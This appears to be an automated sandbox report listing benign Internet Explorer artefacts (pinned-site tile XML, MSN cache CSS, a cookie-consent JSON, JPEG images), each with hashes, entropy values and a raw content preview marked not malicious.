                                                                                                                                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):657
                                                                                                                                                                                                                                                        Entropy (8bit):5.147477486994554
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxOEHnWimI002EtM3MHdNMNxOEHnWimI00ONVbkEtMb:2d6NxOeSZHKd6NxOeSZ7Qb
                                                                                                                                                                                                                                                        MD5:2F15F45B710239847092F18873E4822D
                                                                                                                                                                                                                                                        SHA1:11EDE824D283516A7A3D220581BFEEB3B71FCF90
                                                                                                                                                                                                                                                        SHA-256:841C2455BEF3DD5F0B69CAA8C59701238958F285C7083A2BA73939317AF6BCE6
                                                                                                                                                                                                                                                        SHA-512:0FE7852A54DD9B26E13190E4EE09D9175103BD629FA8A7073D94B55752843E1080E5019CF04ECD74D5146E03772F29F90C557EC6C53B2E2D3935A72929B23878
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):654
                                                                                                                                                                                                                                                        Entropy (8bit):5.115252256826386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxe2kznWimI002EtM3MHdNMNxe2kznWimI00ONkak6EtMb:2d6NxrWSZHKd6NxrWSZ72a7b
                                                                                                                                                                                                                                                        MD5:5104DA6AC98F21E274D46FF9930ACED5
                                                                                                                                                                                                                                                        SHA1:6F2BF2A379C8D3C96C61C24ABF65198EAE2DD867
                                                                                                                                                                                                                                                        SHA-256:1001DE511C85BE947FDDF018F18EE501845839C3DAE76E00B31A98270A49885A
                                                                                                                                                                                                                                                        SHA-512:BF347095EE2A8142CCBEEB2B3B22BCF64E05AA810A450ED3F4F966958DF025577ED953343AF931A76F6955BB613B2CC9F349FABBA818F04834EB29D91BBA2C5C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x0b5d2185,0x01d758f2</date><accdate>0x0b5d2185,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x0b5d2185,0x01d758f2</date><accdate>0x0b5d2185,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):663
                                                                                                                                                                                                                                                        Entropy (8bit):5.160839788529435
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxvLHnWimI002EtM3MHdNMNxvLV7nWimI00ONmZEtMb:2d6NxvzSZHKd6NxvB7SZ7Ub
                                                                                                                                                                                                                                                        MD5:07FC4E5A580353C5ED246E6F3432EB6A
                                                                                                                                                                                                                                                        SHA1:A4BFE70CFC0EBC9CB5BEF4B2EB6F24563644E499
                                                                                                                                                                                                                                                        SHA-256:280DF0007B2D36C568521016B431255FB8A29F2B97C8CDAD923AF5661E382CDB
                                                                                                                                                                                                                                                        SHA-512:7CF358543A7B8B517D04F15580409241F02D264436A682A582C3C121C6AC15FC8F60A709A3BBC7B5FD6FF941A9D002DA3359B1CBE6F3907798CE1749D9BE6F6C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6b6fba,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):648
                                                                                                                                                                                                                                                        Entropy (8bit):5.1633876548795845
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxiHnWimI002EtM3MHdNMNxiHnWimI00ONd5EtMb:2d6NxcSZHKd6NxcSZ7njb
                                                                                                                                                                                                                                                        MD5:9F9FCFD5F6D0058E96DE099C68281D71
                                                                                                                                                                                                                                                        SHA1:BD64E4BDDAD52F89D156B5F4F61FB0EABF59EB5B
                                                                                                                                                                                                                                                        SHA-256:C016756CB6E556547C114FCD62CE56786B390FE95E09849B9A686613DBC634E9
                                                                                                                                                                                                                                                        SHA-512:4E45E3F4F086AA45235DE7CC5959B1F27EEA890410B764838A5F0E1CF6A033CEF7BF0B7E9CFCF766B19FF88A1B2904938277128E25453A8294B128B4143DEA05
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):657
                                                                                                                                                                                                                                                        Entropy (8bit):5.0947585965455335
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxhGwn5y5knWimI002EtM3MHdNMNxhGwn5y5knWimI00ON8K075EtMb:2d6NxQ45y5kSZHKd6NxQ45y5kSZ7uKa/
                                                                                                                                                                                                                                                        MD5:5B673268F5D3A81E1BF6B1315658621C
                                                                                                                                                                                                                                                        SHA1:DD6B93AE7A00A0B2AE9353CA9C01188BDC5BCB1B
                                                                                                                                                                                                                                                        SHA-256:042D0C060984C92589E21224F8A1373B051E8F8A5CB8AEBEA07E4E0A7D0A8793
                                                                                                                                                                                                                                                        SHA-512:CE729F3691A76CC39D593C7DB012BE2C73592FB49A91B0EC31F7EE66AA696D89F076457AE261C037F7C29367082CD1A1BD9DEAAF1F2F3B10E322924C03DDFCE0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x0bee910d,0x01d758f2</date><accdate>0x0bee910d,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x0bee910d,0x01d758f2</date><accdate>0x0bee910d,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):654
                                                                                                                                                                                                                                                        Entropy (8bit):5.151469492028531
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNx0nHnWimI002EtM3MHdNMNx0nHnWimI00ONxEtMb:2d6Nx0HSZHKd6Nx0HSZ7Vb
                                                                                                                                                                                                                                                        MD5:5F484B08BA7B45452BD1B45E8FAB2C96
                                                                                                                                                                                                                                                        SHA1:03A215C96ED8992B3CE9F11F613275A921D4BE19
                                                                                                                                                                                                                                                        SHA-256:74306CE32BB3472E876B92615B9AE9E44D88A83A9A2F380032B24216DD9A667B
                                                                                                                                                                                                                                                        SHA-512:19ED2212CA64F86D3044AE132868DC11CB3D78598E872993532083C75E984DE2D25397E4173A3A668253A6D28F437A4522FC306F020780074E659E2AFE9E23FC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):657
                                                                                                                                                                                                                                                        Entropy (8bit):5.187052438652138
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxxHnWimI002EtM3MHdNMNxxHnWimI00ON6Kq5EtMb:2d6Nx5SZHKd6Nx5SZ7ub
                                                                                                                                                                                                                                                        MD5:BCD0A9C2A8F5143D4D38A504482EF07A
                                                                                                                                                                                                                                                        SHA1:242BF071C22F3D6BBADE6EA3C9CAE35B65C166A7
                                                                                                                                                                                                                                                        SHA-256:3051489A5D01B49CA52DCD5BFE953C19AA1CD897F31A73110B3F04343B882B6B
                                                                                                                                                                                                                                                        SHA-512:36C59344BDC0B573DA2B6C1A27200B2306E6CB8E7439379D121851335C4BB0CFD713DBE81A062A912F69C845910F68594D5E3EECBA7DEBDC386CD5C134F6D287
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):660
                                                                                                                                                                                                                                                        Entropy (8bit):5.160739814082624
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxcHnWimI002EtM3MHdNMNxcHnWimI00ONVEtMb:2d6NxmSZHKd6NxmSZ71b
                                                                                                                                                                                                                                                        MD5:0EBBFBE92E1ECFB6CB5A64A78564EFAA
                                                                                                                                                                                                                                                        SHA1:2C25B9956BC47F20619327060886064ABBC42BE1
                                                                                                                                                                                                                                                        SHA-256:BE14C168CEB35B35541FBEF783E740F56F894461F61170FB25F1CE8F6036B43D
                                                                                                                                                                                                                                                        SHA-512:D40C4D3A1EF7F891380DACFF711C4AE000AAA66FE700780B52C4C111BED5BDE882E79CC33B90E7143BA30BAA11314D04394AFC001D481A622F43F45E0CFEA4BA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):654
                                                                                                                                                                                                                                                        Entropy (8bit):5.148167913013114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdNMNxfnHnWimI002EtM3MHdNMNxfnHnWimI00ONe5EtMb:2d6NxPSZHKd6NxPSZ7Ejb
                                                                                                                                                                                                                                                        MD5:187C05CB768B06E3F2F79B487B42508B
                                                                                                                                                                                                                                                        SHA1:DD3D0943701AD639BE0D13FC76BB5AAAA1FC2583
                                                                                                                                                                                                                                                        SHA-256:49353DAF3F4C98FBA7BEFB9BE16EE69D893ECBCC54B4B0AB5385EFB5AE4EDC33
                                                                                                                                                                                                                                                        SHA-512:2CDCF6474B7F3B24607D10A602207CB695DAF72CE9BF1B5283F8EA5D36956A6BA7E67E80C2F7A8954667378843BB5C9DDF7E698934A1830BFC43C49522AF9D56
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                        Entropy (8bit):7.033005759935274
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGjan:u6tWu/6symC+PTCq5TcBUX4bc
                                                                                                                                                                                                                                                        MD5:F9FEF25202B24ED659E5AD6B5BC9E03D
                                                                                                                                                                                                                                                        SHA1:E2FA70B864304D424236B0AF1A5F7FFD7E926A61
                                                                                                                                                                                                                                                        SHA-256:28AB079BDFECC1F0224ACCA693BC0A4B2A13BF68BF4562C6DE7E325E58614899
                                                                                                                                                                                                                                                        SHA-512:0106A29665C952E2E52D0E0B77395AD20D5A32032C5C19B4BE3104FDDF0F195C9996237703DD8A11F6FBFECA3832458EA16B8A7D7EBFF47C952E5F67570AA946
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........T..`....T..`....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):249857
                                                                                                                                                                                                                                                        Entropy (8bit):5.295039902555087
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:jaPMUzTAHEkm8OUdvUvOZkru/rpjp4tQH:ja0UzTAHLOUdv1Zkru/rpjp4tQH
                                                                                                                                                                                                                                                        MD5:B16073A9EC93B3B478EC2D5305BAB0E8
                                                                                                                                                                                                                                                        SHA1:446E73EF46D83EE7BE6AFC3F7707D409DFE3FFF3
                                                                                                                                                                                                                                                        SHA-256:6561EBD5D1938217C45AD793DA4DCF4772B5B6E339C2B4A1086AB273EBB0865A
                                                                                                                                                                                                                                                        SHA-512:19B2F38AF4AD3DB28F1823D94928DEABEF5FC5D1B61EF7E4DAE5E242ADB7403C0BE7F30BFAF07A259DB31C35ED9A9A043928FB3655F47D9C063B38E5C3FD9CEF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: @charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .caption span.nativead,.mip a.nativead .caption span.nativead{display:block;margin:.9rem 0 .1rem}.ip a.nativead .caption span.sourcename,.mip a.nativead .caption span.sourcename{margin:.5rem 0 .1rem;max-width:100%}.todaymodule.mediuminfopanehero .ip_
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2939
                                                                                                                                                                                                                                                        Entropy (8bit):4.794189660497687
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAcHHPk5JKIcFerZjSaSZjfumjVT4:OymDwb40zrvdip5GHZa6AymshjUjVjx4
                                                                                                                                                                                                                                                        MD5:B2B036D0AFB84E48CDB782A34C34B9D5
                                                                                                                                                                                                                                                        SHA1:DFC7C8BA62D71767F2A60AED568D915D1C9F82D6
                                                                                                                                                                                                                                                        SHA-256:DC51F0A9F93038659B0DB1B69B69FCFB00FB5911805F8B1E40591F9867FD566F
                                                                                                                                                                                                                                                        SHA-512:C2AAAF7BC1DF73018D92ABD994AF3C0041DCCE883C10F4F4E17685CD349B3AF320BBA29718F98CFF6CC24BE4BDD5360E1D3327AFFBF0C87622AE7CBAB677CF22
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.json
                                                                                                                                                                                                                                                        Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAKDiAr[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2042
                                                                                                                                                                                                                                                        Entropy (8bit):7.747742724470814
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:QfAuETA4y0N53gXwHPJLtzBItPInXozQlwrB608:Qf7ERVfzHRLtFItPOXyQirs08
                                                                                                                                                                                                                                                        MD5:D8B2E7076283F5415C6C385D37C9721E
                                                                                                                                                                                                                                                        SHA1:5CE4280A515C6CD8B59EED3ADEF20A08FF32BBB3
                                                                                                                                                                                                                                                        SHA-256:B853C13465213A89709DECEF267B8C1334F391EF009CC50F635E81CEA07DF082
                                                                                                                                                                                                                                                        SHA-512:2EDD8771DAB399A21C87A36D30DE98B5B7A8EAD81198C3EB7DB56E2244F43FE6198015A888952D59BB82FD070978E23EA8061D823A4590620A0483DC2ED85589
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKDiAr.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2103&y=1402
                                                                                                                                                                                                                                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z@H(..i....PY..$...z...n.Ih...<Q`1..9._*...8.+.tWs..`?.....ope.r. .`LM0$....m*..$..8..._F.J.0....<...N.r.....2..q..E..>.T.x4....4.=...M.....2..._..I.b..`.._i.?.o`.q/u8@"'...1.ml.n.L./..J.a.;....7....Y.".I3.R2>.W.....&\.9Q...J|,..$..S..LFm....1;`c..#.x5,erF.8...1s@.h...Mk0..).....L..c.A}.....`.$.a...p(..V.^..O.$I........VW7..^......Gp.y#.......(.u(!..VEd...5.2@....J....H....3
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAKE5Vf[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10411
                                                                                                                                                                                                                                                        Entropy (8bit):7.893985443621554
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:QtqgIEIJzyYCTw7tsMCnRuAwxJlhvpkJ4DqMZ5EJ45N:+q7CTw6MCYAwjLp64ZwON
                                                                                                                                                                                                                                                        MD5:F21B12D64C4A73EE45F4BC85101E96B1
                                                                                                                                                                                                                                                        SHA1:A25096AC193783CD8A3E1A52C7BA2FEAFE482B96
                                                                                                                                                                                                                                                        SHA-256:508AC8DE6881D1D8BC77FBA8B03AAE192DB5DC01C72988F68EDCD11999A1A87D
                                                                                                                                                                                                                                                        SHA-512:9FBE5C1921C4ED692DAF1A6315EFB720BF5C84311786BBA993880B868FB59E94A02BDB2E127A3F8E72D7E102F1817D9E1FC106956AC81B84875838FA3601AB44
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKE5Vf.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg&x=405&y=74
